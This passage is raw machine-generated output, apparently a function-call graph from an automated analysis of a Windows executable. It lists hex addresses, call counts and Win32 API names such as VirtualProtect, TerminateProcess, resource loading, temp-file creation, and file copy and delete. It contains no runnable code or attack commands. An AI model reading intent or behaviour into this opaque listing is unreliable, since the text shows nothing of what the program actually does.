97333->97543 97335->97333 97337 9f636e 97335->97337 97344 9bfddb 22 API calls 97335->97344 97345 9bfe0b 22 API calls 97335->97345 97353 9b15c7 messages 97335->97353 97354 9b152f 97335->97354 97355 9f63b2 97335->97355 97399 9aec40 97335->97399 97547 a1359c 82 API calls __wsopen_s 97337->97547 97339 9b1872 97544 9bfaeb 23 API calls 97339->97544 97340 9b153c 97343 9b1940 9 API calls 97340->97343 97341 9f63d1 97549 a25745 54 API calls _wcslen 97341->97549 97346 9b1549 97343->97346 97344->97335 97345->97335 97348 9b1940 9 API calls 97346->97348 97346->97353 97358 9b1563 97348->97358 97349 9b171d 97349->97310 97352 9b167b messages 97352->97349 97540 9bce17 22 API calls messages 97352->97540 97353->97339 97353->97352 97356 9b1940 9 API calls 97353->97356 97423 a0d4ce 97353->97423 97426 a2959f 97353->97426 97429 a16ef1 97353->97429 97509 a2e505 97353->97509 97522 9a4f39 97353->97522 97528 a1f0ec 97353->97528 97537 a2958b 97353->97537 97550 a1359c 82 API calls __wsopen_s 97353->97550 97354->97340 97354->97341 97548 a1359c 82 API calls __wsopen_s 97355->97548 97356->97353 97358->97353 97360 9aa8c7 22 API calls 97358->97360 97360->97353 97368->97310 97369->97310 97371 9aacf9 97370->97371 97379 9aad2a messages 97370->97379 97372 9aad55 97371->97372 97374 9aad01 messages 97371->97374 97373 9aa8c7 22 API calls 97372->97373 97372->97379 97373->97379 97375 9efa48 97374->97375 97376 9aad21 97374->97376 97374->97379 97375->97379 98398 9bce17 22 API calls messages 97375->98398 97377 9efa3a VariantClear 97376->97377 97376->97379 97377->97379 97379->97280 97380->97304 97382 9aa8ea __fread_nolock 97381->97382 97383 9aa8db 97381->97383 97382->97304 97383->97382 97384 9bfe0b 22 API calls 97383->97384 97384->97382 97385->97304 97386->97304 97387->97308 97388->97304 97390 9b195d 97389->97390 97391 9b1981 97389->97391 97398 9b13a0 97390->97398 97553 9c0242 5 API calls __Init_thread_wait 97390->97553 97551 9c0242 5 API calls __Init_thread_wait 97391->97551 97393 9b198b 97393->97390 97552 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97393->97552 97396 9b8727 97396->97398 97554 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97396->97554 97398->97324 97418 9aec76 messages 97399->97418 97400 9bfddb 22 API calls 97400->97418 97402 9afef7 97406 9aa8c7 22 API calls 97402->97406 97415 9aed9d messages 97402->97415 97404 9f4b0b 97558 a1359c 82 API calls __wsopen_s 97404->97558 97405 9f4600 97411 9aa8c7 22 API calls 97405->97411 97405->97415 97406->97415 97409 9c0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97409->97418 97410 9aa8c7 22 API calls 97410->97418 97411->97415 97413 9afbe3 97413->97415 97416 9f4bdc 97413->97416 97422 9af3ae messages 97413->97422 97414 9aa961 22 API calls 97414->97418 97415->97335 97559 a1359c 82 API calls __wsopen_s 97416->97559 97417 9c00a3 29 API calls pre_c_initialization 97417->97418 97418->97400 97418->97402 97418->97404 97418->97405 97418->97409 97418->97410 97418->97413 97418->97414 97418->97415 97418->97417 97420 9f4beb 97418->97420 97421 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97418->97421 97418->97422 97555 9b01e0 235 API calls 2 library calls 97418->97555 97556 9b06a0 41 API calls messages 97418->97556 97560 a1359c 82 API calls __wsopen_s 97420->97560 97421->97418 97422->97415 97557 a1359c 82 API calls __wsopen_s 97422->97557 97561 a0dbbe lstrlenW 97423->97561 97566 a27f59 97426->97566 97428 a295af 97428->97353 97430 9aa961 22 API calls 97429->97430 97431 a16f1d 97430->97431 97432 9aa961 22 API calls 97431->97432 97433 a16f26 97432->97433 97434 a16f3a 97433->97434 97882 9ab567 97433->97882 97436 9a7510 53 API calls 97434->97436 97442 a16f57 _wcslen 97436->97442 97437 a16fbc 97440 9a7510 53 API calls 97437->97440 97438 a170bf 97697 9a4ecb 97438->97697 97443 a16fc8 97440->97443 97442->97437 97442->97438 97451 a170e9 97442->97451 97447 9aa8c7 22 API calls 97443->97447 97450 a16fdb 97443->97450 97444 a170e5 97446 9aa961 22 API calls 97444->97446 97444->97451 97445 9a4ecb 94 API calls 97445->97444 97448 a1711a 97446->97448 97447->97450 97452 9aa961 22 API calls 97448->97452 97449 a17027 97454 9a7510 53 API calls 97449->97454 97450->97449 97453 a17005 97450->97453 97456 9aa8c7 22 API calls 97450->97456 97451->97353 97455 a17126 97452->97455 97457 9a33c6 22 API calls 97453->97457 97458 a17034 97454->97458 97459 9aa961 22 API calls 97455->97459 97456->97453 97461 a1700f 97457->97461 97462 a17047 97458->97462 97463 a1703d 97458->97463 97460 a1712f 97459->97460 97465 9aa961 22 API calls 97460->97465 97466 9a7510 53 API calls 97461->97466 97887 a0e199 GetFileAttributesW 97462->97887 97467 9aa8c7 22 API calls 97463->97467 97469 a17138 97465->97469 97470 a1701b 97466->97470 97467->97462 97468 a17050 97471 a17063 97468->97471 97474 9a4c6d 22 API calls 97468->97474 97472 9a7510 53 API calls 97469->97472 97473 9a6350 22 API calls 97470->97473 97476 9a7510 53 API calls 97471->97476 97482 a17069 97471->97482 97475 a17145 97472->97475 97473->97449 97474->97471 97719 9a525f 97475->97719 97478 a170a0 97476->97478 97888 a0d076 57 API calls 97478->97888 97479 a17166 97761 9a4c6d 97479->97761 97482->97451 97484 a171a9 97485 9aa8c7 22 API calls 97484->97485 97487 a171ba 97485->97487 97486 9a4c6d 22 API calls 97488 a17186 97486->97488 97764 9a6350 97487->97764 97488->97484 97491 9a6b57 22 API calls 97488->97491 97493 a1719b 97491->97493 97492 9a6350 22 API calls 97494 a171d6 97492->97494 97495 9a6b57 22 API calls 97493->97495 97496 9a6350 22 API calls 97494->97496 97495->97484 97497 a171e4 97496->97497 97498 9a7510 53 API calls 97497->97498 97499 a171f0 97498->97499 97773 a0d7bc 97499->97773 97501 a17201 97502 a0d4ce 4 API calls 97501->97502 97503 a1720b 97502->97503 97504 9a7510 53 API calls 97503->97504 97508 a17239 97503->97508 97505 a17229 97504->97505 97827 a12947 97505->97827 97507 9a4f39 68 API calls 97507->97451 97508->97507 97510 9a7510 53 API calls 97509->97510 97511 a2e51d 97510->97511 97512 9aa961 22 API calls 97511->97512 97513 a2e52b 97512->97513 97514 9ab567 39 API calls 97513->97514 97515 a2e536 97514->97515 97516 a2e560 97515->97516 97519 9a7510 53 API calls 97515->97519 98354 9a62b5 22 API calls 97516->98354 97518 a2e56c 97518->97353 97520 a2e551 97519->97520 97521 9a6d25 22 API calls 97520->97521 97521->97516 97523 9a4f4a 97522->97523 97524 9a4f43 97522->97524 97526 9a4f6a FreeLibrary 97523->97526 97527 9a4f59 97523->97527 97525 9ce678 67 API calls 97524->97525 97525->97523 97526->97527 97527->97353 97529 9a7510 53 API calls 97528->97529 97530 a1f126 97529->97530 98355 9a9e90 97530->98355 97532 a1f15b 97536 a1f15f 97532->97536 98383 9a9c6e 22 API calls 97532->98383 97533 a1f136 97533->97532 97534 9aec40 235 API calls 97533->97534 97534->97532 97536->97353 97538 a27f59 120 API calls 97537->97538 97539 a2959b 97538->97539 97539->97353 97540->97352 97541->97321 97542->97323 97543->97339 97544->97339 97545->97319 97546->97353 97547->97353 97548->97353 97549->97358 97550->97353 97551->97393 97552->97390 97553->97396 97554->97398 97555->97418 97556->97418 97557->97415 97558->97415 97559->97420 97560->97415 97562 a0d4d5 97561->97562 97563 a0dbdc GetFileAttributesW 97561->97563 97562->97353 97563->97562 97564 a0dbe8 FindFirstFileW 97563->97564 97564->97562 97565 a0dbf9 FindClose 97564->97565 97565->97562 97604 9a7510 97566->97604 97570 a28281 97571 a2844f 97570->97571 97575 a2828f 97570->97575 97667 a28ee4 60 API calls 97571->97667 97574 a2845e 97574->97575 97576 a2846a 97574->97576 97640 a27e86 97575->97640 97592 a27fd5 messages 97576->97592 97577 9a7510 53 API calls 97595 a28049 97577->97595 97582 a282c8 97655 9bfc70 97582->97655 97585 a28302 97662 9a63eb 22 API calls 97585->97662 97586 a282e8 97661 a1359c 82 API calls __wsopen_s 97586->97661 97589 a282f3 GetCurrentProcess TerminateProcess 97589->97585 97590 a28311 97663 9a6a50 22 API calls 97590->97663 97592->97428 97593 a2832a 97603 a28352 97593->97603 97664 9b04f0 22 API calls 97593->97664 97595->97570 97595->97577 97595->97592 97659 a0417d 22 API calls __fread_nolock 97595->97659 97660 a2851d 42 API calls _strftime 97595->97660 97596 a284c5 97596->97592 97600 a284d9 FreeLibrary 97596->97600 97597 a28341 97665 a28b7b 75 API calls 97597->97665 97600->97592 97602 9aaceb 23 API calls 97602->97603 97603->97596 97603->97602 97666 9b04f0 22 API calls 97603->97666 97668 a28b7b 75 API calls 97603->97668 97605 9a7525 97604->97605 97622 9a7522 97604->97622 97606 9a755b 97605->97606 97607 9a752d 97605->97607 97611 9e500f 97606->97611 97612 9a756d 97606->97612 97618 9e50f6 97606->97618 97669 9c51c6 26 API calls 97607->97669 97609 9a753d 97617 9bfddb 22 API calls 97609->97617 97614 9e5088 97611->97614 97621 9bfe0b 22 API calls 97611->97621 97670 9bfb21 51 API calls 97612->97670 97671 9bfb21 51 API calls 97614->97671 97615 9e510e 97615->97615 97619 9a7547 97617->97619 97672 9c5183 26 API calls 97618->97672 97620 9a9cb3 22 API calls 97619->97620 97620->97622 97624 9e5058 97621->97624 97622->97592 97627 a28cd3 97622->97627 97623 9bfddb 22 API calls 97625 9e507f 97623->97625 97624->97623 97626 9a9cb3 22 API calls 97625->97626 97626->97614 97628 9aaec9 22 API calls 97627->97628 97629 a28cee CharLowerBuffW 97628->97629 97673 a08e54 97629->97673 97633 9aa961 22 API calls 97634 a28d2a 97633->97634 97680 9a6d25 97634->97680 97636 a28d3e 97637 9a93b2 22 API calls 97636->97637 97639 a28d48 _wcslen 97637->97639 97638 a28e5e _wcslen 97638->97595 97639->97638 97693 a2851d 42 API calls _strftime 97639->97693 97641 a27ea1 97640->97641 97642 a27eec 97640->97642 97643 9bfe0b 22 API calls 97641->97643 97646 a29096 97642->97646 97644 a27ec3 97643->97644 97644->97642 97645 9bfddb 22 API calls 97644->97645 97645->97644 97647 a292ab messages 97646->97647 97654 a290ba _strcat _wcslen 97646->97654 97647->97582 97648 9ab567 39 API calls 97648->97654 97649 9ab38f 39 API calls 97649->97654 97650 9ab6b5 39 API calls 97650->97654 97651 9a7510 53 API calls 97651->97654 97652 9cea0c 21 API calls ___std_exception_copy 97652->97654 97654->97647 97654->97648 97654->97649 97654->97650 97654->97651 97654->97652 97696 a0efae 24 API calls _wcslen 97654->97696 97656 9bfc85 97655->97656 97657 9bfd1d VirtualProtect 97656->97657 97658 9bfceb 97656->97658 97657->97658 97658->97585 97658->97586 97659->97595 97660->97595 97661->97589 97662->97590 97663->97593 97664->97597 97665->97603 97666->97603 97667->97574 97668->97603 97669->97609 97670->97609 97671->97618 97672->97615 97674 a08e74 _wcslen 97673->97674 97675 a08f63 97674->97675 97678 a08ea9 97674->97678 97679 a08f68 97674->97679 97675->97633 97675->97639 97678->97675 97694 9bce60 41 API calls 97678->97694 97679->97675 97695 9bce60 41 API calls 97679->97695 97681 9a6d91 97680->97681 97682 9a6d34 97680->97682 97684 9a93b2 22 API calls 97681->97684 97682->97681 97683 9a6d3f 97682->97683 97685 9a6d5a 97683->97685 97686 9e4c9d 97683->97686 97690 9a6d62 __fread_nolock 97684->97690 97688 9a6f34 22 API calls 97685->97688 97687 9bfddb 22 API calls 97686->97687 97689 9e4ca7 97687->97689 97688->97690 97691 9bfe0b 22 API calls 97689->97691 97690->97636 97692 9e4cda 97691->97692 97693->97638 97694->97678 97695->97679 97696->97654 97889 9a4e90 LoadLibraryA 97697->97889 97702 9e3ccf 97705 9a4f39 68 API calls 97702->97705 97703 9a4ef6 LoadLibraryExW 97897 9a4e59 LoadLibraryA 97703->97897 97707 9e3cd6 97705->97707 97709 9a4e59 3 API calls 97707->97709 97711 9e3cde 97709->97711 97710 9a4f20 97710->97711 97712 9a4f2c 97710->97712 97919 9a50f5 97711->97919 97714 9a4f39 68 API calls 97712->97714 97716 9a4f31 97714->97716 97716->97444 97716->97445 97718 9e3d05 97720 9aa961 22 API calls 97719->97720 97721 9a5275 97720->97721 97722 9aa961 22 API calls 97721->97722 97723 9a527d 97722->97723 97724 9aa961 22 API calls 97723->97724 97725 9a5285 97724->97725 97726 9aa961 22 API calls 97725->97726 97727 9a528d 97726->97727 97728 9e3df5 97727->97728 97729 9a52c1 97727->97729 97730 9aa8c7 22 API calls 97728->97730 97731 9a6d25 22 API calls 97729->97731 97732 9e3dfe 97730->97732 97733 9a52cf 97731->97733 97734 9aa6c3 22 API calls 97732->97734 97735 9a93b2 22 API calls 97733->97735 97738 9a5304 97734->97738 97736 9a52d9 97735->97736 97736->97738 97739 9a6d25 22 API calls 97736->97739 97737 9a5349 97741 9a6d25 22 API calls 97737->97741 97738->97737 97740 9a5325 97738->97740 97756 9e3e20 97738->97756 97742 9a52fa 97739->97742 97740->97737 97745 9a4c6d 22 API calls 97740->97745 97743 9a535a 97741->97743 97744 9a93b2 22 API calls 97742->97744 97746 9a5370 97743->97746 97750 9aa8c7 22 API calls 97743->97750 97744->97738 97748 9a5332 97745->97748 97747 9a5384 97746->97747 97752 9aa8c7 22 API calls 97746->97752 97751 9a538f 97747->97751 97754 9aa8c7 22 API calls 97747->97754 97748->97737 97753 9a6d25 22 API calls 97748->97753 97749 9a6b57 22 API calls 97758 9e3ee0 97749->97758 97750->97746 97755 9aa8c7 22 API calls 97751->97755 97759 9a539a 97751->97759 97752->97747 97753->97737 97754->97751 97755->97759 97756->97749 97757 9a4c6d 22 API calls 97757->97758 97758->97737 97758->97757 98052 9a49bd 22 API calls __fread_nolock 97758->98052 97759->97479 97762 9aaec9 22 API calls 97761->97762 97763 9a4c78 97762->97763 97763->97484 97763->97486 97765 9a6362 97764->97765 97766 9e4a51 97764->97766 98053 9a6373 97765->98053 98063 9a4a88 22 API calls __fread_nolock 97766->98063 97769 9a636e 97769->97492 97770 9e4a5b 97771 9aa8c7 22 API calls 97770->97771 97772 9e4a67 97770->97772 97771->97772 97774 a0d7d8 97773->97774 97775 a0d7f3 97774->97775 97776 a0d7dd 97774->97776 97777 9aa961 22 API calls 97775->97777 97778 9aa8c7 22 API calls 97776->97778 97826 a0d7ee 97776->97826 97779 a0d7fb 97777->97779 97778->97826 97780 9aa961 22 API calls 97779->97780 97781 a0d803 97780->97781 97782 9aa961 22 API calls 97781->97782 97783 a0d80e 97782->97783 97784 9aa961 22 API calls 97783->97784 97785 a0d816 97784->97785 97786 9aa961 22 API calls 97785->97786 97787 a0d81e 97786->97787 97788 9aa961 22 API calls 97787->97788 97789 a0d826 97788->97789 97790 9aa961 22 API calls 97789->97790 97791 a0d82e 97790->97791 97792 9aa961 22 API calls 97791->97792 97793 a0d836 97792->97793 97794 9a525f 22 API calls 97793->97794 97795 a0d84d 97794->97795 97796 9a525f 22 API calls 97795->97796 97797 a0d866 97796->97797 97798 9a4c6d 22 API calls 97797->97798 97799 a0d872 97798->97799 97800 a0d885 97799->97800 97801 9a93b2 22 API calls 97799->97801 97802 9a4c6d 22 API calls 97800->97802 97801->97800 97803 a0d88e 97802->97803 97804 a0d89e 97803->97804 97805 9a93b2 22 API calls 97803->97805 97806 a0d8b0 97804->97806 97807 9aa8c7 22 API calls 97804->97807 97805->97804 97808 9a6350 22 API calls 97806->97808 97807->97806 97809 a0d8bb 97808->97809 98064 a0d978 22 API calls 97809->98064 97811 a0d8ca 98065 a0d978 22 API calls 97811->98065 97813 a0d8dd 97814 9a4c6d 22 API calls 97813->97814 97815 a0d8e7 97814->97815 97816 a0d8ec 97815->97816 97817 a0d8fe 97815->97817 97818 9a33c6 22 API calls 97816->97818 97819 9a4c6d 22 API calls 97817->97819 97820 a0d8f9 97818->97820 97821 a0d907 97819->97821 97823 9a6350 22 API calls 97820->97823 97822 a0d925 97821->97822 97825 9a33c6 22 API calls 97821->97825 97824 9a6350 22 API calls 97822->97824 97823->97822 97824->97826 97825->97820 97826->97501 97828 a12954 __wsopen_s 97827->97828 97829 9bfe0b 22 API calls 97828->97829 97830 a12971 97829->97830 97831 9a5722 22 API calls 97830->97831 97832 a1297b 97831->97832 97833 a1274e 27 API calls 97832->97833 97834 a12986 97833->97834 97835 9a511f 64 API calls 97834->97835 97836 a1299b 97835->97836 97837 a12a6c 97836->97837 97838 a129bf 97836->97838 97839 a12e66 75 API calls 97837->97839 98092 a12e66 97838->98092 97841 a12a38 97839->97841 97844 9a50f5 40 API calls 97841->97844 97846 a12a75 messages 97841->97846 97845 a12a91 97844->97845 97847 9a50f5 40 API calls 97845->97847 97846->97508 97848 a12aa1 97847->97848 97850 9a50f5 40 API calls 97848->97850 97849 a129ed 98099 9cd583 26 API calls 97849->98099 97852 a12abc 97850->97852 97853 9a50f5 40 API calls 97852->97853 97854 a12acc 97853->97854 97855 9a50f5 40 API calls 97854->97855 97856 a12ae7 97855->97856 97857 9a50f5 40 API calls 97856->97857 97858 a12af7 97857->97858 97859 9a50f5 40 API calls 97858->97859 97860 a12b07 97859->97860 97861 9a50f5 40 API calls 97860->97861 97862 a12b17 97861->97862 98066 a13017 GetTempPathW GetTempFileNameW 97862->98066 97864 a12b22 97865 9ce5eb 29 API calls 97864->97865 97876 a12b33 97865->97876 97866 a12bed 98076 9ce678 97866->98076 97868 a12bf8 97870 a12c12 97868->97870 97871 a12bfe DeleteFileW 97868->97871 97869 9a50f5 40 API calls 97869->97876 97872 a12c91 CopyFileW 97870->97872 97878 a12c18 97870->97878 97871->97846 97873 a12ca7 DeleteFileW 97872->97873 97874 a12cb9 DeleteFileW 97872->97874 97873->97846 98089 a12fd8 CreateFileW 97874->98089 97876->97846 97876->97866 97876->97869 98067 9cdbb3 97876->98067 98100 a122ce 79 API calls 97878->98100 97880 a12c7c 97880->97874 97881 a12c80 DeleteFileW 97880->97881 97881->97846 97883 9ab578 97882->97883 97884 9ab57f 97882->97884 97883->97884 98353 9c62d1 39 API calls _strftime 97883->98353 97884->97434 97886 9ab5c2 97886->97434 97887->97468 97888->97482 97890 9a4ea8 GetProcAddress 97889->97890 97891 9a4ec6 97889->97891 97892 9a4eb8 97890->97892 97894 9ce5eb 97891->97894 97892->97891 97893 9a4ebf FreeLibrary 97892->97893 97893->97891 97927 9ce52a 97894->97927 97896 9a4eea 97896->97702 97896->97703 97898 9a4e6e GetProcAddress 97897->97898 97899 9a4e8d 97897->97899 97900 9a4e7e 97898->97900 97902 9a4f80 97899->97902 97900->97899 97901 9a4e86 FreeLibrary 97900->97901 97901->97899 97903 9bfe0b 22 API calls 97902->97903 97904 9a4f95 97903->97904 97905 9a5722 22 API calls 97904->97905 97906 9a4fa1 __fread_nolock 97905->97906 97907 9e3d1d 97906->97907 97908 9a50a5 97906->97908 97913 9a4fdc 97906->97913 97992 a1304d 74 API calls 97907->97992 97981 9a42a2 CreateStreamOnHGlobal 97908->97981 97911 9e3d22 97914 9a511f 64 API calls 97911->97914 97912 9a50f5 40 API calls 97912->97913 97913->97911 97913->97912 97918 9a506e messages 97913->97918 97987 9a511f 97913->97987 97915 9e3d45 97914->97915 97916 9a50f5 40 API calls 97915->97916 97916->97918 97918->97710 97920 9a5107 97919->97920 97923 9e3d70 97919->97923 98014 9ce8c4 97920->98014 97924 a128fe 98035 a1274e 97924->98035 97926 a12919 97926->97718 97930 9ce536 __FrameHandler3::FrameUnwindToState 97927->97930 97928 9ce544 97952 9cf2d9 20 API calls __dosmaperr 97928->97952 97930->97928 97932 9ce574 97930->97932 97931 9ce549 97953 9d27ec 26 API calls _abort 97931->97953 97934 9ce579 97932->97934 97935 9ce586 97932->97935 97954 9cf2d9 20 API calls __dosmaperr 97934->97954 97944 9d8061 97935->97944 97938 9ce58f 97939 9ce595 97938->97939 97940 9ce5a2 97938->97940 97955 9cf2d9 20 API calls __dosmaperr 97939->97955 97956 9ce5d4 LeaveCriticalSection __fread_nolock 97940->97956 97942 9ce554 __wsopen_s 97942->97896 97945 9d806d __FrameHandler3::FrameUnwindToState 97944->97945 97957 9d2f5e EnterCriticalSection 97945->97957 97947 9d807b 97958 9d80fb 97947->97958 97951 9d80ac __wsopen_s 97951->97938 97952->97931 97953->97942 97954->97942 97955->97942 97956->97942 97957->97947 97959 9d811e 97958->97959 97960 9d8177 97959->97960 97967 9d8088 97959->97967 97975 9c918d EnterCriticalSection 97959->97975 97976 9c91a1 LeaveCriticalSection 97959->97976 97977 9d4c7d 20 API calls 2 library calls 97960->97977 97962 9d8180 97964 9d29c8 _free 20 API calls 97962->97964 97965 9d8189 97964->97965 97965->97967 97978 9d3405 11 API calls 2 library calls 97965->97978 97972 9d80b7 97967->97972 97968 9d81a8 97979 9c918d EnterCriticalSection 97968->97979 97971 9d81bb 97971->97967 97980 9d2fa6 LeaveCriticalSection 97972->97980 97974 9d80be 97974->97951 97975->97959 97976->97959 97977->97962 97978->97968 97979->97971 97980->97974 97982 9a42d9 97981->97982 97983 9a42bc FindResourceExW 97981->97983 97982->97913 97983->97982 97984 9e35ba LoadResource 97983->97984 97984->97982 97985 9e35cf SizeofResource 97984->97985 97985->97982 97986 9e35e3 LockResource 97985->97986 97986->97982 97988 9a512e 97987->97988 97991 9e3d90 97987->97991 97993 9cece3 97988->97993 97992->97911 97996 9ceaaa 97993->97996 97995 9a513c 97995->97913 97999 9ceab6 __FrameHandler3::FrameUnwindToState 97996->97999 97997 9ceac2 98009 9cf2d9 20 API calls __dosmaperr 97997->98009 97999->97997 98000 9ceae8 97999->98000 98011 9c918d EnterCriticalSection 98000->98011 98002 9ceac7 98010 9d27ec 26 API calls _abort 98002->98010 98003 9ceaf4 98012 9cec0a 62 API calls 2 library calls 98003->98012 98006 9ceb08 98013 9ceb27 LeaveCriticalSection __fread_nolock 98006->98013 98008 9cead2 __wsopen_s 98008->97995 98009->98002 98010->98008 98011->98003 98012->98006 98013->98008 98017 9ce8e1 98014->98017 98016 9a5118 98016->97924 98018 9ce8ed __FrameHandler3::FrameUnwindToState 98017->98018 98019 9ce92d 98018->98019 98020 9ce900 ___scrt_fastfail 98018->98020 98021 9ce925 __wsopen_s 98018->98021 98032 9c918d EnterCriticalSection 98019->98032 98030 9cf2d9 20 API calls __dosmaperr 98020->98030 98021->98016 98023 9ce937 98033 9ce6f8 38 API calls 4 library calls 98023->98033 98026 9ce91a 98031 9d27ec 26 API calls _abort 98026->98031 98027 9ce94e 98034 9ce96c LeaveCriticalSection __fread_nolock 98027->98034 98030->98026 98031->98021 98032->98023 98033->98027 98034->98021 98038 9ce4e8 98035->98038 98037 a1275d 98037->97926 98041 9ce469 98038->98041 98040 9ce505 98040->98037 98042 9ce478 98041->98042 98044 9ce48c 98041->98044 98049 9cf2d9 20 API calls __dosmaperr 98042->98049 98048 9ce488 __alldvrm 98044->98048 98051 9d333f 11 API calls 2 library calls 98044->98051 98045 9ce47d 98050 9d27ec 26 API calls _abort 98045->98050 98048->98040 98049->98045 98050->98048 98051->98048 98052->97758 98054 9a63b6 __fread_nolock 98053->98054 98055 9a6382 98053->98055 98054->97769 98055->98054 98056 9e4a82 98055->98056 98057 9a63a9 98055->98057 98058 9bfddb 22 API calls 98056->98058 98059 9aa587 22 API calls 98057->98059 98060 9e4a91 98058->98060 98059->98054 98061 9bfe0b 22 API calls 98060->98061 98062 9e4ac5 __fread_nolock 98061->98062 98063->97770 98064->97811 98065->97813 98066->97864 98068 9cdbc1 98067->98068 98074 9cdbdd 98067->98074 98069 9cdbcd 98068->98069 98070 9cdbe3 98068->98070 98068->98074 98104 9cf2d9 20 API calls __dosmaperr 98069->98104 98101 9cd9cc 98070->98101 98073 9cdbd2 98105 9d27ec 26 API calls _abort 98073->98105 98074->97876 98077 9ce684 __FrameHandler3::FrameUnwindToState 98076->98077 98078 9ce6aa 98077->98078 98079 9ce695 98077->98079 98088 9ce6a5 __wsopen_s 98078->98088 98260 9c918d EnterCriticalSection 98078->98260 98277 9cf2d9 20 API calls __dosmaperr 98079->98277 98081 9ce69a 98278 9d27ec 26 API calls _abort 98081->98278 98084 9ce6c6 98261 9ce602 98084->98261 98086 9ce6d1 98279 9ce6ee LeaveCriticalSection __fread_nolock 98086->98279 98088->97868 98090 a13013 98089->98090 98091 a12fff SetFileTime CloseHandle 98089->98091 98090->97846 98091->98090 98097 a12e7a 98092->98097 98093 a129c4 98093->97846 98098 9cd583 26 API calls 98093->98098 98094 9a50f5 40 API calls 98094->98097 98095 a128fe 27 API calls 98095->98097 98096 9a511f 64 API calls 98096->98097 98097->98093 98097->98094 98097->98095 98097->98096 98098->97849 98099->97841 98100->97880 98106 9cd97b 98101->98106 98103 9cd9f0 98103->98074 98104->98073 98105->98074 98107 9cd987 __FrameHandler3::FrameUnwindToState 98106->98107 98114 9c918d EnterCriticalSection 98107->98114 98109 9cd995 98115 9cd9f4 98109->98115 98113 9cd9b3 __wsopen_s 98113->98103 98114->98109 98123 9d49a1 98115->98123 98121 9cd9a2 98122 9cd9c0 LeaveCriticalSection __fread_nolock 98121->98122 98122->98113 98144 9cd955 98123->98144 98125 9d49b0 98151 9df89b 98125->98151 98127 9d49b6 98128 9cda09 98127->98128 98129 9d3820 __fread_nolock 21 API calls 98127->98129 98132 9cda3a 98128->98132 98130 9d4a15 98129->98130 98131 9d29c8 _free 20 API calls 98130->98131 98131->98128 98133 9cda24 98132->98133 98135 9cda4c 98132->98135 98143 9d4a56 62 API calls 98133->98143 98134 9cda5a 98190 9cf2d9 20 API calls __dosmaperr 98134->98190 98135->98133 98135->98134 98140 9cda85 __fread_nolock 98135->98140 98137 9cda5f 98191 9d27ec 26 API calls _abort 98137->98191 98140->98133 98141 9cd955 __fread_nolock 26 API calls 98140->98141 98165 9d59be 98140->98165 98192 9cdc0b 98140->98192 98141->98140 98143->98121 98145 9cd976 98144->98145 98146 9cd961 98144->98146 98145->98125 98160 9cf2d9 20 API calls __dosmaperr 98146->98160 98148 9cd966 98161 9d27ec 26 API calls _abort 98148->98161 98150 9cd971 98150->98125 98152 9df8a8 98151->98152 98153 9df8b5 98151->98153 98162 9cf2d9 20 API calls __dosmaperr 98152->98162 98155 9df8c1 98153->98155 98163 9cf2d9 20 API calls __dosmaperr 98153->98163 98155->98127 98157 9df8ad 98157->98127 98158 9df8e2 98164 9d27ec 26 API calls _abort 98158->98164 98160->98148 98161->98150 98162->98157 98163->98158 98164->98157 98166 9d59ca __FrameHandler3::FrameUnwindToState 98165->98166 98167 9d59ea 98166->98167 98168 9d59d2 98166->98168 98170 9d5a88 98167->98170 98174 9d5a1f 98167->98174 98252 9cf2c6 20 API calls __dosmaperr 98168->98252 98257 9cf2c6 20 API calls __dosmaperr 98170->98257 98172 9d59d7 98253 9cf2d9 20 API calls __dosmaperr 98172->98253 98173 9d5a8d 98258 9cf2d9 20 API calls __dosmaperr 98173->98258 98198 9d5147 EnterCriticalSection 98174->98198 98178 9d59df __wsopen_s 98178->98140 98179 9d5a95 98259 9d27ec 26 API calls _abort 98179->98259 98180 9d5a25 98182 9d5a56 98180->98182 98183 9d5a41 98180->98183 98199 9d5aa9 98182->98199 98254 9cf2d9 20 API calls __dosmaperr 98183->98254 98186 9d5a46 98255 9cf2c6 20 API calls __dosmaperr 98186->98255 98188 9d5a51 98256 9d5a80 LeaveCriticalSection __wsopen_s 98188->98256 98190->98137 98191->98133 98193 9cdc1f 98192->98193 98194 9cdc23 98192->98194 98193->98140 98194->98193 98195 9cd955 __fread_nolock 26 API calls 98194->98195 98196 9cdc43 98195->98196 98197 9d59be __wsopen_s 62 API calls 98196->98197 98197->98193 98198->98180 98200 9d5ad7 98199->98200 98247 9d5ad0 98199->98247 98201 9d5adb 98200->98201 98202 9d5afa 98200->98202 98203 9cf2c6 __dosmaperr 20 API calls 98201->98203 98206 9d5b4b 98202->98206 98207 9d5b2e 98202->98207 98205 9d5ae0 98203->98205 98204 9c0a8c _ValidateLocalCookies 5 API calls 98208 9d5cb1 98204->98208 98209 9cf2d9 __dosmaperr 20 API calls 98205->98209 98210 9d5b61 98206->98210 98213 9d9424 __fread_nolock 28 API calls 98206->98213 98211 9cf2c6 __dosmaperr 20 API calls 98207->98211 98208->98188 98212 9d5ae7 98209->98212 98214 9d564e __wsopen_s 39 API calls 98210->98214 98215 9d5b33 98211->98215 98216 9d27ec _abort 26 API calls 98212->98216 98213->98210 98217 9d5b6a 98214->98217 98218 9cf2d9 __dosmaperr 20 API calls 98215->98218 98216->98247 98220 9d5b6f 98217->98220 98221 9d5ba8 98217->98221 98219 9d5b3b 98218->98219 98222 9d27ec _abort 26 API calls 98219->98222 98225 9d5b95 98220->98225 98226 9d5b73 98220->98226 98223 9d5bbc 98221->98223 98224 9d5c02 WriteFile 98221->98224 98222->98247 98229 9d5bc4 98223->98229 98230 9d5bf2 98223->98230 98227 9d5c25 GetLastError 98224->98227 98231 9d5b8b 98224->98231 98228 9d542e __wsopen_s 45 API calls 98225->98228 98234 9d55e1 __wsopen_s GetLastError WriteConsoleW CreateFileW 98226->98234 98241 9d5c69 98226->98241 98227->98231 98228->98231 98232 9d5bc9 98229->98232 98233 9d5be2 98229->98233 98235 9d56c4 __wsopen_s 7 API calls 98230->98235 98231->98241 98242 9d5c45 98231->98242 98231->98247 98238 9d5bd2 98232->98238 98232->98241 98239 9d5891 __wsopen_s 8 API calls 98233->98239 98234->98231 98236 9d5be0 98235->98236 98236->98231 98237 9cf2d9 __dosmaperr 20 API calls 98240 9d5c8e 98237->98240 98243 9d57a3 __wsopen_s 7 API calls 98238->98243 98239->98236 98244 9cf2c6 __dosmaperr 20 API calls 98240->98244 98241->98237 98241->98247 98245 9d5c4c 